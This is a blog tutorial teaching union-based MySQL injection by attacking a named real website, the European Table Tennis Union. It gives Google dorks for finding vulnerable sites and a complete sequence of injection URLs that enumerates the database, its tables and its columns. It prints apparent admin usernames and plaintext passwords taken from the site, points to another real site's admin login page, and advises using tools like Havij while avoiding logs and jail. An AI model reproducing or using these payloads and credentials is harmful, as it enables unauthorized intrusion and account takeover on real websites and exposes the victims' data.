MySQL Injectioin Tutorial
Structure:
1.Intro#
2.What is SQL
3.MySQL
4.How to find vulnerability
5.Exploiting Mysql vulnerability
6.Getting Mysql Version
7.Getting Mysql User
8.Getting Mysql Databases
9.Getting Mysql Tables
10.Getting Mysql Columns
11.Getting Information From Columns
12.Finding Admin Panel
13.Tools
14.Greetz
15.End#
2.What is SQL
3.MySQL
4.How to find vulnerability
5.Exploiting Mysql vulnerability
6.Getting Mysql Version
7.Getting Mysql User
8.Getting Mysql Databases
9.Getting Mysql Tables
10.Getting Mysql Columns
11.Getting Information From Columns
12.Finding Admin Panel
13.Tools
14.Greetz
15.End#
1. Intro#
today am going to explain MySQL Injection on Live Example.What that means?-Well it means that i'll exploit an real site.This tutorial is for anykind level reader,student,newbie even noob.I just wonna to show you how easy is this prefor of Attack.So enough talking we have a lot of things to cover here.
2. What is SQL?
SQL injection is probably the most abundant programming flaw that exists on the internet at present. It is the vulnerability through which unauthorized person can access the various critical and private dat. SQL injection is not a flaw in the web or db server but but is a result of the poor and inexperienced programming practices. And it is one of the deadliest as well as easiest attack to execute from remote location.
In SQL injection, we interact with DB server with the various commands and get various data from it. In this tutorial, I would be discussing 3 aspects of SQL injection namely bypassing logins, accessing the secret data and modifying the page contents.
3. MySQL
MySQL is a relational database management system (RDBMS) that runs as a server providing multi-user access to a number of databases. It is named after developer Michael Widenius daughter, My. The SQL phrase stands for Structured Query Language.
=So the basic what you need to know about SQL and MySQL are done now the real part begins
4. How to find vulnerability
There many many ways to find vulnerability.Most familiar ways are using the Google Dorks:
inurl:index.php?id=
inurl:article.php?id=
allinurl:news.php?id=
inurl:shop.php?cat=
Hackers always say "Google is my Best Friend" now you know way without of google we couldn't do our job so easy.So at the end of this tutorial i'll post a dork list so am going to save you from searching the internet.
5. Exploiting Mysql vulnerability
So lets start with exploiting our target.For this tutorial i dicided to chose European Table Tennis Union
Code:
http://www.ettu.org
I have used a dork inurl:news_view.php?id= and i got this link of the site
Code:
http://www.ettu.org/news_view.php?id=2583
So how can we test it is it vuln. on MySQL Injection? - Its simple with adding ' or % at the and or before the id.Now our vuln. link should look like this
Code:
http://www.ettu.org/news_view.php?id=2583'
Did you notice something was changed?-Yes the content that was previos on the site was not showed.So this is a sing that this site may be vuln. on MySQL Injection sometimes will print you a message that says
Code:
Warning: mysql_fetch_assoc(),Warning: mysql_fetch_array(),mysql_num_rows(),mysql error,mysql_query,mysql_fetch,mysql_connect
In this case doesn't show so we also may be facing with MySQL NoError Injection.How can we know for sure is it vuln.?-We are going to start typeing
ORDER BY 1 After the ID number
Code:
http://www.ettu.org/news_view.php?id=2583+ORDER+BY+1
So our content is shown agaen.And now we are sure we're facing a site that is vuln. on MySQLInjection.We continue to incrise the Order Number so we find out how many columns are there until we get an blan page agaen.
Code:
http://www.ettu.org/news_view.php?id=2583+ORDER+BY+2 <== No blank Page
Code:
http://www.ettu.org/news_view.php?id=2583+ORDER+BY+3 <== No blank Page
Code:
http://www.ettu.org/news_view.php?id=2583+ORDER+BY+4 <== No blank Page
Code:
http://www.ettu.org/news_view.php?id=2583+ORDER+BY+10 <== No blank Page
Code:
http://www.ettu.org/news_view.php?id=2583+ORDER+BY+15 <== No blank Page
Code:
http://www.ettu.org/news_view.php?id=2583+ORDER+BY+16 <== No blank Page
Code:
http://www.ettu.org/news_view.php?id=2583+ORDER+BY+17 <== Blank Page
wOOt!! We now know that there are 16 vuln. columns!!
Now we are going to select them all with this comand UNION SELECT or UNION ALL SELECT
Code:
http://www.ettu.org/news_view.php?id=258...14,15,16--
Dont forget to put "--" at the end or it will return an blank page.So the content loads agaen and lets see witch of these vuln. columns we can use.To do that we add a '-' before the ID Number
Code:
http://www.ettu.org/news_view.php?id=-25...14,15,16--
So this is very important if you dont do this you cannot continue to do the next several steps and now it prints us a vuln. columns number 2 and number 4.So this means that columns with number 2 and 4 are vulnruble and we can use them.To get Mysql version,User,Databases.
6. Getting Mysql Version
To get MySQL version we use version() or @@version commands to dispaly version of MySQL Database.So we change 2 into @@version and
Code:
http://www.ettu.org/news_view.php?id=258...14,15,16--
there is it MySQL Version displayet at the page.
Code:
5.1.37-1ubuntu5.5
So when MySQL Version is 5> we can use information_schema to get data faster but if version is >5 that means that we need to guess the tables and columns.So we need to be very lucky to guess the tabale and column.
7. Getting Mysql User
Getting the user is with the user() command
Code:
http://www.ettu.org/news_view.php?id=-25...14,15,16--
Displayed
Code:
ettu_admin@localhost
8. Getting Mysql Databases
So now we need to get the databases with the followed command database()
Code:
http://www.ettu.org/news_view.php?id=-25...14,15,16--
Displayed
Code:
ettu.org_ettu_db01
Sometimes there are more databases so it good to know how many databases there are and why are they for.Becouse maybe the data we are looking is in the other database.
9. Getting Mysql Tables
And here we are at the main think.How to find out the table names.
We are going to do this with adding this command
Code:
group_concat(table_name)
at the place of the vun. column and in our case is 2 and with adding at the end of the number of columns the following command
Code:
FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()
What does this mean?-This means to select Table Names from information_schema where table schema is from the Database. and when we replace everything we get this link and this tables:
Code:
http://www.ettu.org/news_view.php?id=-25...,14,15,16+
FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--
We got a lots of tables but we dont need them all so am going to press Ctrl+F [Find specific word] and type user,users,admin,members and it turns out that there is a table with the name
Code:
0910ettucup01_admin
Now we know that there is table with name admin and there must be some username and passwords but to that we need to find the columns in that table!
10.Getting Mysql Columns
We found out that theres a table admin and now we need to find the columns we need to change table_name to column_name and
Code:
FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--
to
FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_SCHEMA=DATABASE()--
Now when we change all that we get
Code:
http://www.ettu.org/news_view.php?id=-25...,14,15,16+
FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_SCHEMA=DATABASE()--
with executing this we get a lot i mean really a lot of columns name that we dont need and it may take a while till we find our most needed columns so we are going to pull out only the columns from our table that we found earlier and that is from ettu.org_ettu_db01 to do this we need to you MySQL Char How to find it?-Well you can always use google or you can install on your mozila an addon with name HackBar there is a MySQL char converter so now am going to convert our table into a Mysql Char
Code:
CHAR(48, 57, 49, 48, 101, 116, 116, 117, 99, 117, 112, 48, 49, 95, 97, 100, 109, 105, 110)
Now where to put this?-We are going to change our link into:
Code:
http://www.ettu.org/news_view.php?id=-25...,14,15,16+
from+information_schema.columns+where+table_name=CHAR%2848,%2057,%2049,%2048,%20101,%20116,%20116,
%20117,%2099,%20117,%20112,%2048,%2049,%2095,%2097,%20100,%20109,%20105,%20110%29--
Now are displayed the columns that are in Table 'ADMIN'
Code:
id,login,password,stato,id_squ,girone,abilitato
Our work is almost done.Just to dump usernames and passwords.
11.Getting Information From Columns
To do this we are going to use a command that we are using it all the way till here.And that is group_concat().All we now need to do is to change column_name into our ectual column names and that are "login,password,id,stato ect" So lets see how ill it looks
Code:
http://www.ettu.org/news_view.php?id=-25...,14,15,16+
from+0910ettucup01_admin--
Damn the usernames and passwords are displayed at the site.So let explain here what we have done.We have changed information_schema.columns into the table name 'cuz we dont need not to read the columns 'cuz we already put them into the group_concat() you see id login password those are columns now from where to be selected from the table name 0910ettucup01_admin and now we have our login details:
Code:
1:adminvitesse:vitesse2006
2:admin:matchvitesse
All it left now is to find the Admin Panel....
12.Finding Admin Panel
Unfortunatly our live example site doesn't have an admin panel so for this to show you i'll took another site.So when you got the admin details we need to login somewhere that somewhere is called Admin Panel or ControlPanel or WebPanel its same or you can say it Login Page.To find an login page you can use many tools ill tell you some in the next part.An example of an login page
Code:
http://www.discountexpress.co.uk/admin/
There you can enter the login info and get into the site and change alot
13.Tools
So tools,there aren't so much tools to use when your doing this but there are a few that will help you a lot.
13.1.Admin Finder
Admin finder is a tool that helps you to find the admin page or Login Page very quick for this you can use many online or you can use some webscanner to find it.Here are 1 Good program and one good Online Scanner
Online Admin Page Scanner
And for download
Acunetix Web Vulnerability Scanner
=>This scanner could be used for more things but now we are not going to talk about them
13.2 Hacking Tools that are making you're work easier
Well we all know that some of you have started with tools ex.Havij or MySQL Helper.Yes they are good in hand expecialy when we are hacking into a MySQL Server >5 that are guessing the table and column names so that is realy good also Havij is a great program that have Admin Finder too and MD5 Section where you can easly search about 10-12 MD5 Decripting sites so yes its realy good program but dont use it for hacking all the way into the server 'cuz it leaves a lotz of logs and you my be finish in jail
©2011, copyright BLACK BURN
Simply awesome.
ReplyDeleteVery very very grateful.. thanks for taking the time to make this
Cheers from Brazil